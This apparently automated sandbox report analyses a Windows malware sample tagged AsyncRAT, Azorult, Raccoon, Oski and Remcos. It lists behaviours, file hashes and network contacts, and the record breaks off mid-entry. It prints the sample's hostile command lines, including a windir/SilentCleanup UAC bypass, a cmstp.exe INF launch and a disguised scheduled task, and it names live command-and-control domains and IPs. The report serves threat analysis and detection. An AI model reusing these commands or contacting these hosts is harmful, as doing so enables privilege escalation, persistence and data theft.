Malware Analysis Report

2024-09-22 22:02

Sample ID 210813-fsvebh2l46
Target ED4D2E0F901BC478BE16D3DAD0D02792.exe
SHA256 959e3ca2579b6be8a11c06763c5a34ec118abc96d869e25bef06319c92da465e
Tags
asyncrat azorult oski raccoon remcos 08082021 fe25b858c52ebb889260990dc343e5dbcf4a96e4 discovery infostealer persistence rat spyware stealer suricata trojan evasion
score
10/10

Analysis Overview

Threat Level: Known bad

The file ED4D2E0F901BC478BE16D3DAD0D02792.exe was found to be: Known bad.

Malicious Activity Summary

Contains code to disable Windows Defender

suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile

Raccoon Stealer Payload

Raccoon

Azorult

Modifies Windows Defender Real-time Protection settings

suricata: ET MALWARE Win32/AZORult V3.3 Client Checkin M16

suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt)

suricata: ET MALWARE Vidar/Arkei/Megumin/Oski Stealer Data Exfil

Remcos

suricata: ET MALWARE Win32/AZORult V3.3 Client Checkin M1

Oski

AsyncRat

Async RAT payload

Blocklisted process makes network request

Executes dropped EXE

Downloads MZ/PE file

Reads user/profile data of web browsers

Loads dropped DLL

Deletes itself

Reads user/profile data of local email clients

Windows security modification

Accesses cryptocurrency files/wallets, possible credential harvesting

Checks installed software on the system

Adds Run key to start application

Suspicious use of SetThreadContext

Enumerates physical storage devices

Checks processor information in registry

Suspicious use of AdjustPrivilegeToken

Delays execution with timeout.exe

Suspicious use of WriteProcessMemory

Suspicious use of SetWindowsHookEx

Suspicious behavior: MapViewOfSection

Kills process with taskkill

Modifies registry key

Modifies system certificate store

Suspicious behavior: EnumeratesProcesses

Creates scheduled task(s)

MITRE ATT&CK Matrix V6

Analysis: static1

Detonation Overview

Reported

2021-08-13 07:57

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2021-08-13 07:57

Reported

2021-08-13 08:03

Platform

win7v20210410

Max time kernel

146s

Max time network

203s

Command Line

"C:\Users\Admin\AppData\Local\Temp\ED4D2E0F901BC478BE16D3DAD0D02792.exe"

Signatures

AsyncRat

rat asyncrat

Azorult

trojan infostealer azorult

Contains code to disable Windows Defender

Oski

infostealer oski

Raccoon

stealer raccoon

Raccoon Stealer Payload

Remcos

rat remcos

suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt)

suricata

suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile

suricata

suricata: ET MALWARE Vidar/Arkei/Megumin/Oski Stealer Data Exfil

suricata

suricata: ET MALWARE Win32/AZORult V3.3 Client Checkin M1

suricata

Async RAT payload

rat

Downloads MZ/PE file

Deletes itself

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\ED4D2E0F901BC478BE16D3DAD0D02792.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6Fze4b3b6t.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\PQm5Var79c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\5k5i1FPvtR.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\SoMGCtgPat.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\DSFnbyhgfrtydfg.exe N/A

Reads user/profile data of local email clients

spyware stealer

Reads user/profile data of web browsers

spyware stealer

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Windows\CurrentVersion\Run\Jjdsdpr = "C:\\Users\\Public\\Libraries\\rpdsdjJ.url" C:\Users\Admin\AppData\Local\Temp\NoUDroDtKf.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Windows\CurrentVersion\Run\Bdojytw = "C:\\Users\\Public\\Libraries\\wtyjodB.url" C:\Users\Admin\AppData\Local\Temp\6Fze4b3b6t.exe N/A

Checks installed software on the system

discovery

Enumerates physical storage devices

Checks processor information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Users\Admin\AppData\Roaming\DSFnbyhgfrtydfg.exe N/A

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Delays execution with timeout.exe

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A

Modifies registry key

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13 C:\Users\Admin\AppData\Local\Temp\ED4D2E0F901BC478BE16D3DAD0D02792.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = (certificate blob omitted) C:\Users\Admin\AppData\Local\Temp\ED4D2E0F901BC478BE16D3DAD0D02792.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\5k5i1FPvtR.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\PQm5Var79c.exe N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\ProgramData\GFDyrtucbvfdg.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ED4D2E0F901BC478BE16D3DAD0D02792.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\DSFnbyhgfrtydfg.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\5k5i1FPvtR.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\PQm5Var79c.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1028 wrote to memory of 1736 N/A C:\Users\Admin\AppData\Local\Temp\ED4D2E0F901BC478BE16D3DAD0D02792.exe C:\ProgramData\GFDyrtucbvfdg.exe
PID 1736 wrote to memory of 1704 N/A C:\ProgramData\GFDyrtucbvfdg.exe C:\ProgramData\GFDyrtucbvfdg.exe
PID 1028 wrote to memory of 1628 N/A C:\Users\Admin\AppData\Local\Temp\ED4D2E0F901BC478BE16D3DAD0D02792.exe C:\Users\Admin\AppData\Roaming\DSFnbyhgfrtydfg.exe
PID 1028 wrote to memory of 1532 N/A C:\Users\Admin\AppData\Local\Temp\ED4D2E0F901BC478BE16D3DAD0D02792.exe C:\Users\Admin\AppData\Local\Temp\ED4D2E0F901BC478BE16D3DAD0D02792.exe
PID 1532 wrote to memory of 1720 N/A C:\Users\Admin\AppData\Local\Temp\ED4D2E0F901BC478BE16D3DAD0D02792.exe C:\Users\Admin\AppData\Local\Temp\SoMGCtgPat.exe
PID 1532 wrote to memory of 1716 N/A C:\Users\Admin\AppData\Local\Temp\ED4D2E0F901BC478BE16D3DAD0D02792.exe C:\Users\Admin\AppData\Local\Temp\NoUDroDtKf.exe
PID 1532 wrote to memory of 1308 N/A C:\Users\Admin\AppData\Local\Temp\ED4D2E0F901BC478BE16D3DAD0D02792.exe C:\Users\Admin\AppData\Local\Temp\PQm5Var79c.exe
PID 1532 wrote to memory of 1712 N/A C:\Users\Admin\AppData\Local\Temp\ED4D2E0F901BC478BE16D3DAD0D02792.exe C:\Users\Admin\AppData\Local\Temp\5k5i1FPvtR.exe
PID 1532 wrote to memory of 760 N/A C:\Users\Admin\AppData\Local\Temp\ED4D2E0F901BC478BE16D3DAD0D02792.exe C:\Users\Admin\AppData\Local\Temp\6Fze4b3b6t.exe
PID 1532 wrote to memory of 1780 N/A C:\Users\Admin\AppData\Local\Temp\ED4D2E0F901BC478BE16D3DAD0D02792.exe C:\Windows\SysWOW64\cmd.exe
PID 1780 wrote to memory of 1728 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 1716 wrote to memory of 1232 N/A C:\Users\Admin\AppData\Local\Temp\NoUDroDtKf.exe C:\Windows\SysWOW64\logagent.exe
PID 1716 wrote to memory of 1600 N/A C:\Users\Admin\AppData\Local\Temp\NoUDroDtKf.exe C:\Windows\SysWOW64\cmd.exe

Processes

C:\Users\Admin\AppData\Local\Temp\ED4D2E0F901BC478BE16D3DAD0D02792.exe

"C:\Users\Admin\AppData\Local\Temp\ED4D2E0F901BC478BE16D3DAD0D02792.exe"

C:\ProgramData\GFDyrtucbvfdg.exe

"C:\ProgramData\GFDyrtucbvfdg.exe"

C:\ProgramData\GFDyrtucbvfdg.exe

"C:\ProgramData\GFDyrtucbvfdg.exe"

C:\Users\Admin\AppData\Roaming\DSFnbyhgfrtydfg.exe

"C:\Users\Admin\AppData\Roaming\DSFnbyhgfrtydfg.exe"

C:\Users\Admin\AppData\Local\Temp\ED4D2E0F901BC478BE16D3DAD0D02792.exe

"C:\Users\Admin\AppData\Local\Temp\ED4D2E0F901BC478BE16D3DAD0D02792.exe"

C:\Users\Admin\AppData\Local\Temp\SoMGCtgPat.exe

"C:\Users\Admin\AppData\Local\Temp\SoMGCtgPat.exe"

C:\Users\Admin\AppData\Local\Temp\NoUDroDtKf.exe

"C:\Users\Admin\AppData\Local\Temp\NoUDroDtKf.exe"

C:\Users\Admin\AppData\Local\Temp\PQm5Var79c.exe

"C:\Users\Admin\AppData\Local\Temp\PQm5Var79c.exe"

C:\Users\Admin\AppData\Local\Temp\5k5i1FPvtR.exe

"C:\Users\Admin\AppData\Local\Temp\5k5i1FPvtR.exe"

C:\Users\Admin\AppData\Local\Temp\6Fze4b3b6t.exe

"C:\Users\Admin\AppData\Local\Temp\6Fze4b3b6t.exe"

C:\Windows\SysWOW64\cmd.exe

cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\ED4D2E0F901BC478BE16D3DAD0D02792.exe"

C:\Windows\SysWOW64\timeout.exe

timeout /T 10 /NOBREAK

C:\Windows\SysWOW64\logagent.exe

C:\Windows\System32\logagent.exe

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Public\Trast.bat" "

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /K C:\Users\Public\UKO.bat

C:\Windows\SysWOW64\reg.exe

reg delete hkcu\Environment /v windir /f

C:\Windows\SysWOW64\reg.exe

reg add hkcu\Environment /v windir /d "cmd /c start /min C:\Users\Public\KDECO.bat reg delete hkcu\Environment /v windir /f && REM "

C:\Windows\SysWOW64\schtasks.exe

schtasks /Run /TN \Microsoft\Windows\DiskCleanup\SilentCleanup /I

C:\Users\Admin\AppData\Local\Temp\6Fze4b3b6t.exe

"C:\Users\Admin\AppData\Local\Temp\6Fze4b3b6t.exe"

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Public\nest.bat" "

C:\Windows\system32\DllHost.exe

C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}

C:\Windows\SysWOW64\schtasks.exe

/C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe"

C:\Windows\SysWOW64\reg.exe

reg delete hkcu\Environment /v windir /f

C:\Users\Admin\AppData\Roaming\DSFnbyhgfrtydfg.exe

"C:\Users\Admin\AppData\Roaming\DSFnbyhgfrtydfg.exe"

C:\Users\Admin\AppData\Local\Temp\PQm5Var79c.exe

"{path}"

C:\Users\Admin\AppData\Local\Temp\5k5i1FPvtR.exe

"{path}"

C:\Users\Admin\AppData\Local\Temp\5k5i1FPvtR.exe

"{path}"

C:\Users\Admin\AppData\Local\Temp\5k5i1FPvtR.exe

"{path}"

C:\Users\Admin\AppData\Local\Temp\5k5i1FPvtR.exe

"{path}"

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\dCtjCu" /XML "C:\Users\Admin\AppData\Local\Temp\tmpFF26.tmp"

C:\Users\Admin\AppData\Local\Temp\5k5i1FPvtR.exe

"{path}"

\??\c:\windows\SysWOW64\cmstp.exe

"c:\windows\system32\cmstp.exe" /au C:\Windows\temp\eiyxrtf0.inf

C:\Users\Admin\AppData\Local\Temp\SoMGCtgPat.exe

"{path}"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c taskkill /pid 1088 & erase C:\Users\Admin\AppData\Roaming\DSFnbyhgfrtydfg.exe & RD /S /Q C:\\ProgramData\\865607833000956\\* & exit

C:\Windows\SysWOW64\taskkill.exe

taskkill /pid 1088

C:\Windows\system32\taskeng.exe

taskeng.exe {3F00FE28-2921-4FE6-B46F-53914580BBC3} S-1-5-21-2513283230-931923277-594887482-1000:MRBKYMNO\Admin:Interactive:[1]

C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe

C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe

C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe

"C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe"

C:\Windows\SysWOW64\schtasks.exe

/C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe"

Network

Country Destination Domain Proto
N/A 8.8.8.8:53 telete.in udp
N/A 195.201.225.248:443 telete.in tcp
N/A 45.67.231.40:80 45.67.231.40 tcp
N/A 8.8.8.8:53 danielmi.ac.ug udp
N/A 185.215.113.77:80 danielmi.ac.ug tcp
N/A 8.8.8.8:53 cdn.discordapp.com udp
N/A 162.159.134.233:443 cdn.discordapp.com tcp
N/A 8.8.8.8:53 sergio.ac.ug udp
N/A 79.134.225.25:6969 sergio.ac.ug tcp
N/A 8.8.8.8:53 ramosasdj.ac.ug udp
N/A 8.8.8.8:53 parhatcsafxz.ac.ug udp
N/A 8.8.8.8:53 heartdoaz.ac.ug udp
N/A 8.8.8.8:53 aertdfvaz.ac.ug udp
N/A 8.8.8.8:53 danielmax.ac.ug udp
N/A 185.215.113.77:80 danielmax.ac.ug tcp
N/A 8.8.8.8:53 icacxndo.ac.ug udp
N/A 194.5.98.107:6970 icacxndo.ac.ug tcp
N/A 8.8.8.8:53 icando.ug udp
N/A 8.8.8.8:53 www.microsoft.com udp

Files

memory/1028-62-0x0000000075591000-0x0000000075593000-memory.dmp

\ProgramData\GFDyrtucbvfdg.exe

MD5 701f6f95d5e205b53b3a74403d46981a
SHA1 3e614af86675b0de761adb5d2fa271bfb3142b95
SHA256 36b216e3219f82031317e03235333638e22d5f93c184e403e2383e322be1e459
SHA512 a7f051d91b24c3a42d81507577f8c9c576f6fd68287a56606f1c0dc7c06c7054d325974b3b176ac019815cce5dbb42ff9104e4d1c7f51fee5f9ee9a420c04d15

memory/1736-65-0x0000000000000000-mapping.dmp

C:\ProgramData\GFDyrtucbvfdg.exe

MD5 701f6f95d5e205b53b3a74403d46981a
SHA1 3e614af86675b0de761adb5d2fa271bfb3142b95
SHA256 36b216e3219f82031317e03235333638e22d5f93c184e403e2383e322be1e459
SHA512 a7f051d91b24c3a42d81507577f8c9c576f6fd68287a56606f1c0dc7c06c7054d325974b3b176ac019815cce5dbb42ff9104e4d1c7f51fee5f9ee9a420c04d15

memory/1704-75-0x0000000000400000-0x0000000000420000-memory.dmp

memory/1736-76-0x0000000000350000-0x0000000000358000-memory.dmp

memory/1736-74-0x0000000000240000-0x0000000000241000-memory.dmp

memory/1028-72-0x00000000001D0000-0x00000000001D1000-memory.dmp

memory/1704-71-0x000000000041A684-mapping.dmp

\Users\Admin\AppData\Roaming\DSFnbyhgfrtydfg.exe

MD5 93fffc6736b1dd95a4f4e88734e9d540
SHA1 509a9acffd9b9123fff2a3df9a860b829210f80a
SHA256 80b57df21ba993430e49e63e47f1afd84ac2f64fe50bb0b19413b2f964c42dd0
SHA512 d56d6e46792df1b06449265973e589559ff630ea2bcbcae54ffd0503188477605a63ca4db38f8e5e29d472368902e959f850226cf3ddaa2c0d6ba6ac3b87faed

memory/1628-80-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Roaming\DSFnbyhgfrtydfg.exe

MD5 93fffc6736b1dd95a4f4e88734e9d540
SHA1 509a9acffd9b9123fff2a3df9a860b829210f80a
SHA256 80b57df21ba993430e49e63e47f1afd84ac2f64fe50bb0b19413b2f964c42dd0
SHA512 d56d6e46792df1b06449265973e589559ff630ea2bcbcae54ffd0503188477605a63ca4db38f8e5e29d472368902e959f850226cf3ddaa2c0d6ba6ac3b87faed

memory/1532-82-0x000000000044003F-mapping.dmp

memory/1704-85-0x00000000002B0000-0x00000000002B1000-memory.dmp

memory/1532-86-0x0000000000400000-0x0000000000495000-memory.dmp

memory/1532-87-0x0000000000230000-0x0000000000231000-memory.dmp

\Users\Admin\AppData\LocalLow\sqlite3.dll

MD5 f964811b68f9f1487c2b41e1aef576ce
SHA1 b423959793f14b1416bc3b7051bed58a1034025f
SHA256 83bc57dcf282264f2b00c21ce0339eac20fcb7401f7c5472c0cd0c014844e5f7
SHA512 565b1a7291c6fcb63205907fcd9e72fc2e11ca945afc4468c378edba882e2f314c2ac21a7263880ff7d4b84c2a1678024c1ac9971ac1c1de2bfa4248ec0f98c4

\Users\Admin\AppData\LocalLow\wG3cB0qZ3rM5x\nss3.dll

MD5 02cc7b8ee30056d5912de54f1bdfc219
SHA1 a6923da95705fb81e368ae48f93d28522ef552fb
SHA256 1989526553fd1e1e49b0fea8036822ca062d3d39c4cab4a37846173d0f1753d5
SHA512 0d5dfcf4fb19b27246fa799e339d67cd1b494427783f379267fb2d10d615ffb734711bab2c515062c078f990a44a36f2d15859b1dacd4143dcc35b5c0cee0ef5

\Users\Admin\AppData\LocalLow\wG3cB0qZ3rM5x\mozglue.dll

MD5 eae9273f8cdcf9321c6c37c244773139
SHA1 8378e2a2f3635574c106eea8419b5eb00b8489b0
SHA256 a0c6630d4012ae0311ff40f4f06911bcf1a23f7a4762ce219b8dffa012d188cc
SHA512 06e43e484a89cea9ba9b9519828d38e7c64b040f44cdaeb321cbda574e7551b11fea139ce3538f387a0a39a3d8c4cba7f4cf03e4a3c98db85f8121c2212a9097

\Users\Admin\AppData\LocalLow\wG3cB0qZ3rM5x\vcruntime140.dll

MD5 7587bf9cb4147022cd5681b015183046
SHA1 f2106306a8f6f0da5afb7fc765cfa0757ad5a628
SHA256 c40bb03199a2054dabfc7a8e01d6098e91de7193619effbd0f142a7bf031c14d
SHA512 0b63e4979846ceba1b1ed8470432ea6aa18cca66b5f5322d17b14bc0dfa4b2ee09ca300a016e16a01db5123e4e022820698f46d9bad1078bd24675b4b181e91f

\Users\Admin\AppData\LocalLow\wG3cB0qZ3rM5x\msvcp140.dll

MD5 109f0f02fd37c84bfc7508d4227d7ed5
SHA1 ef7420141bb15ac334d3964082361a460bfdb975
SHA256 334e69ac9367f708ce601a6f490ff227d6c20636da5222f148b25831d22e13d4
SHA512 46eb62b65817365c249b48863d894b4669e20fcb3992e747cd5c9fdd57968e1b2cf7418d1c9340a89865eadda362b8db51947eb4427412eb83b35994f932fd39

\Users\Admin\AppData\LocalLow\wG3cB0qZ3rM5x\softokn3.dll

MD5 4e8df049f3459fa94ab6ad387f3561ac
SHA1 06ed392bc29ad9d5fc05ee254c2625fd65925114
SHA256 25a4dae37120426ab060ebb39b7030b3e7c1093cc34b0877f223b6843b651871
SHA512 3dd4a86f83465989b2b30c240a7307edd1b92d5c1d5c57d47eff287dc9daa7bace157017908d82e00be90f08ff5badb68019ffc9d881440229dcea5038f61cd6

\Users\Admin\AppData\LocalLow\wG3cB0qZ3rM5x\freebl3.dll

MD5 60acd24430204ad2dc7f148b8cfe9bdc
SHA1 989f377b9117d7cb21cbe92a4117f88f9c7693d9
SHA256 9876c53134dbbec4dcca67581f53638eba3fea3a15491aa3cf2526b71032da97
SHA512 626c36e9567f57fa8ec9c36d96cbadede9c6f6734a7305ecfb9f798952bbacdfa33a1b6c4999ba5b78897dc2ec6f91870f7ec25b2ceacbaee4be942fe881db01

memory/1720-97-0x0000000000000000-mapping.dmp

\Users\Admin\AppData\Local\Temp\SoMGCtgPat.exe

MD5 abeb86fdec0060ffb80f364cabd30b1b
SHA1 3c9c7b3ee66ff071eb32848ad5a62fab9683427c
SHA256 2d5d1a4d6bc5abb1e0ad26c3d9801a44317d0a50a370db5de488763b98fc766b
SHA512 c23e558f3fd6b426a2d076c95fed01fcedb3ddd6a81be36e57c845b06ce3bd8d59dbd1e759246d8a523d6c335d3dd669c8e1fdf533701ac93dc346a5948467f4

C:\Users\Admin\AppData\Local\Temp\SoMGCtgPat.exe

MD5 abeb86fdec0060ffb80f364cabd30b1b
SHA1 3c9c7b3ee66ff071eb32848ad5a62fab9683427c
SHA256 2d5d1a4d6bc5abb1e0ad26c3d9801a44317d0a50a370db5de488763b98fc766b
SHA512 c23e558f3fd6b426a2d076c95fed01fcedb3ddd6a81be36e57c845b06ce3bd8d59dbd1e759246d8a523d6c335d3dd669c8e1fdf533701ac93dc346a5948467f4

memory/1720-100-0x00000000002F0000-0x00000000002F1000-memory.dmp

memory/1720-102-0x00000000020D0000-0x0000000002136000-memory.dmp

memory/1720-103-0x00000000049B0000-0x00000000049B1000-memory.dmp

memory/1720-104-0x00000000004B0000-0x00000000004B2000-memory.dmp

\Users\Admin\AppData\Local\Temp\NoUDroDtKf.exe

MD5 457e1bf09958f400b72e470e672dad6b
SHA1 15e2efa61dc81321614dfb32b45901b938f001d1
SHA256 d40371030031fc84f0cd14b20865ab1a243b4fb45c1afb4075067a97591bccee
SHA512 7caf3fcaf4b11eb1a3cb0cc708580a80b0a41b9c5f688afcc377e40d5b1f75ef0e37c4d1ed59f1c425c453f5659d5ccf5e87c499da41ed2058a8801d5e633da7

memory/1716-107-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\NoUDroDtKf.exe

MD5 457e1bf09958f400b72e470e672dad6b
SHA1 15e2efa61dc81321614dfb32b45901b938f001d1
SHA256 d40371030031fc84f0cd14b20865ab1a243b4fb45c1afb4075067a97591bccee
SHA512 7caf3fcaf4b11eb1a3cb0cc708580a80b0a41b9c5f688afcc377e40d5b1f75ef0e37c4d1ed59f1c425c453f5659d5ccf5e87c499da41ed2058a8801d5e633da7

\Users\Admin\AppData\Local\Temp\NoUDroDtKf.exe

MD5 457e1bf09958f400b72e470e672dad6b
SHA1 15e2efa61dc81321614dfb32b45901b938f001d1
SHA256 d40371030031fc84f0cd14b20865ab1a243b4fb45c1afb4075067a97591bccee
SHA512 7caf3fcaf4b11eb1a3cb0cc708580a80b0a41b9c5f688afcc377e40d5b1f75ef0e37c4d1ed59f1c425c453f5659d5ccf5e87c499da41ed2058a8801d5e633da7

memory/1716-109-0x0000000000220000-0x0000000000221000-memory.dmp

\Users\Admin\AppData\Local\Temp\PQm5Var79c.exe

MD5 df5e3ee9a6098d1e29b31603672d5a8f
SHA1 0af2378effff0a7451317874efe4e6682365c03e
SHA256 fa98235aae1687afb628d39a16645b6d2f4afeb97d113229c660425464e296c2
SHA512 8fe4afbddb19fcd95eef6e7b2f944af68f1f09985ac28a4674c4301e48b245084865a8ffc483e7268982286dbb766bf30a2755fcdc7853a85bb629adf26035d9

memory/1308-111-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\PQm5Var79c.exe

MD5 df5e3ee9a6098d1e29b31603672d5a8f
SHA1 0af2378effff0a7451317874efe4e6682365c03e
SHA256 fa98235aae1687afb628d39a16645b6d2f4afeb97d113229c660425464e296c2
SHA512 8fe4afbddb19fcd95eef6e7b2f944af68f1f09985ac28a4674c4301e48b245084865a8ffc483e7268982286dbb766bf30a2755fcdc7853a85bb629adf26035d9

memory/1308-114-0x0000000001280000-0x0000000001281000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\PQm5Var79c.exe

MD5 df5e3ee9a6098d1e29b31603672d5a8f
SHA1 0af2378effff0a7451317874efe4e6682365c03e
SHA256 fa98235aae1687afb628d39a16645b6d2f4afeb97d113229c660425464e296c2
SHA512 8fe4afbddb19fcd95eef6e7b2f944af68f1f09985ac28a4674c4301e48b245084865a8ffc483e7268982286dbb766bf30a2755fcdc7853a85bb629adf26035d9

memory/1308-116-0x0000000000B80000-0x0000000000BE0000-memory.dmp

memory/1308-117-0x0000000001210000-0x0000000001211000-memory.dmp

\Users\Admin\AppData\Local\Temp\5k5i1FPvtR.exe

MD5 6439889cfd410e3b57422781c93e26cf
SHA1 12280091094281fa60fa8321006abfc7c4bd4e33
SHA256 c58ec23d6e9d1f548d0d9375009bf23ebfb9f40eb9bb14fccc4e10f385f53d5d
SHA512 1c2e9e52e4596e939d830556729ff53b75503e8e695f76e6607c7e6147562ba8e5183678ad990b3070cc70f5b4867ac8263209f7ba2213460a46789dbc24c86e

C:\Users\Admin\AppData\Local\Temp\5k5i1FPvtR.exe

MD5 6439889cfd410e3b57422781c93e26cf
SHA1 12280091094281fa60fa8321006abfc7c4bd4e33
SHA256 c58ec23d6e9d1f548d0d9375009bf23ebfb9f40eb9bb14fccc4e10f385f53d5d
SHA512 1c2e9e52e4596e939d830556729ff53b75503e8e695f76e6607c7e6147562ba8e5183678ad990b3070cc70f5b4867ac8263209f7ba2213460a46789dbc24c86e

memory/1712-120-0x0000000000000000-mapping.dmp

memory/1712-123-0x00000000003A0000-0x00000000003A1000-memory.dmp

memory/1712-125-0x00000000006E0000-0x0000000000740000-memory.dmp

memory/1712-126-0x00000000049C0000-0x00000000049C1000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\NoUDroDtKf.exe

MD5 457e1bf09958f400b72e470e672dad6b
SHA1 15e2efa61dc81321614dfb32b45901b938f001d1
SHA256 d40371030031fc84f0cd14b20865ab1a243b4fb45c1afb4075067a97591bccee
SHA512 7caf3fcaf4b11eb1a3cb0cc708580a80b0a41b9c5f688afcc377e40d5b1f75ef0e37c4d1ed59f1c425c453f5659d5ccf5e87c499da41ed2058a8801d5e633da7

\Users\Admin\AppData\Local\Temp\6Fze4b3b6t.exe

MD5 3694ac62d90c1e9f89145f324dc0e204
SHA1 f2953a9ba829d6fd1e0955dbc95e55abd08234e1
SHA256 ce294b3c9e58d2d6394e2aa447ad3b586e0e23cdd22bd050a362bdd57a3e3fe9
SHA512 65a3c2503d26f440522b34307d7e64d2af1409391230daa99c21efb1718337acd6db6808efd26f4b0c3fc04e8566250d4662780a7510edefdbb65f53ae4ee21d

memory/760-132-0x0000000000000000-mapping.dmp

\Users\Admin\AppData\Local\Temp\6Fze4b3b6t.exe

MD5 3694ac62d90c1e9f89145f324dc0e204
SHA1 f2953a9ba829d6fd1e0955dbc95e55abd08234e1
SHA256 ce294b3c9e58d2d6394e2aa447ad3b586e0e23cdd22bd050a362bdd57a3e3fe9
SHA512 65a3c2503d26f440522b34307d7e64d2af1409391230daa99c21efb1718337acd6db6808efd26f4b0c3fc04e8566250d4662780a7510edefdbb65f53ae4ee21d

C:\Users\Admin\AppData\Local\Temp\6Fze4b3b6t.exe

MD5 3694ac62d90c1e9f89145f324dc0e204
SHA1 f2953a9ba829d6fd1e0955dbc95e55abd08234e1
SHA256 ce294b3c9e58d2d6394e2aa447ad3b586e0e23cdd22bd050a362bdd57a3e3fe9
SHA512 65a3c2503d26f440522b34307d7e64d2af1409391230daa99c21efb1718337acd6db6808efd26f4b0c3fc04e8566250d4662780a7510edefdbb65f53ae4ee21d

memory/1780-134-0x0000000000000000-mapping.dmp

memory/1728-135-0x0000000000000000-mapping.dmp

memory/760-136-0x0000000000220000-0x0000000000221000-memory.dmp

memory/1232-137-0x0000000000000000-mapping.dmp

memory/1600-138-0x0000000000000000-mapping.dmp

memory/1232-139-0x0000000000100000-0x0000000000101000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\6Fze4b3b6t.exe

MD5 3694ac62d90c1e9f89145f324dc0e204
SHA1 f2953a9ba829d6fd1e0955dbc95e55abd08234e1
SHA256 ce294b3c9e58d2d6394e2aa447ad3b586e0e23cdd22bd050a362bdd57a3e3fe9
SHA512 65a3c2503d26f440522b34307d7e64d2af1409391230daa99c21efb1718337acd6db6808efd26f4b0c3fc04e8566250d4662780a7510edefdbb65f53ae4ee21d

memory/1232-142-0x0000000000080000-0x0000000000081000-memory.dmp

memory/1232-144-0x0000000000260000-0x0000000000261000-memory.dmp

memory/1232-145-0x0000000010580000-0x00000000105F3000-memory.dmp

C:\Users\Public\Trast.bat

MD5 4068c9f69fcd8a171c67f81d4a952a54
SHA1 4d2536a8c28cdcc17465e20d6693fb9e8e713b36
SHA256 24222300c78180b50ed1f8361ba63cb27316ec994c1c9079708a51b4a1a9d810
SHA512 a64f9319acc51fffd0491c74dcd9c9084c2783b82f95727e4bfe387a8528c6dcf68f11418e88f1e133d115daf907549c86dd7ad866b2a7938add5225fbb2811d

memory/1492-147-0x0000000000000000-mapping.dmp

C:\Users\Public\UKO.bat

MD5 eaf8d967454c3bbddbf2e05a421411f8
